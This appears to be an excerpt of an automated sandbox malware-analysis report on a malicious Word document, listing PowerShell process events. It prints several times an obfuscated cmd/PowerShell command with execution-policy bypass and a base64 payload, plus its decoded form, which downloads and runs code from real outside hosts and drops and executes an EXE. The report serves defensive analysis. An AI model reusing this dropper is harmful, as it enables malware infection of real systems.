      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2800Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: powershell.exe, 00000004.00000002.402979711.0000000000490000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Encrypted powershell cmdline option foundShow sources
      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $instance = [System.Activator]::CreateInstance("System.Net.WebClient");$method = [System.Net.WebClient].GetMethods();foreach($m in $method){ if($m.Name -eq "DownloadString"){ try{ $uri = New-Object System.Uri("http://176.32.35.16/704e.php") IEX($m.Invoke($instance, ($uri))); }catch{} } if($m.Name -eq "DownloadData"){ try{ $uri = New-Object System.Uri("http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gas") $response = $m.Invoke($instance, ($uri)); $path = [System.Environment]::GetFolderPath("CommonApplicationData") + "\\QdZGP.exe"; [System.IO.File]::WriteAllBytes($path, $response); $clsid = New-Object Guid 'C08AFD90-F2A1-11D1-8455-00A0C91F3880' $type = [Type]::GetTypeFromCLSID($clsid) $object = [Activator]::CreateInstance($type) $object.Document.Application.ShellExecute($path,$nul, $nul, $nul,0) }catch{} }}Exit;
      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $instance = [System.Activator]::CreateInstance("System.Net.WebClient");$method = [System.Net.WebClient].GetMethods();foreach($m in $method){ if($m.Name -eq "DownloadString"){ try{ $uri = New-Object System.Uri("http://176.32.35.16/704e.php") IEX($m.Invoke($instance, ($uri))); }catch{} } if($m.Name -eq "DownloadData"){ try{ $uri = New-Object System.Uri("http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gas") $response = $m.Invoke($instance, ($uri)); $path = [System.Environment]::GetFolderPath("CommonApplicationData") + "\\QdZGP.exe"; [System.IO.File]::WriteAllBytes($path, $response); $clsid = New-Object Guid 'C08AFD90-F2A1-11D1-8455-00A0C91F3880' $type = [Type]::GetTypeFromCLSID($clsid) $object = [Activator]::CreateInstance($type) $object.Document.Application.ShellExecute($path,$nul, $nul, $nul,0) }catch{} }}Exit;Jump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=Jump to behavior
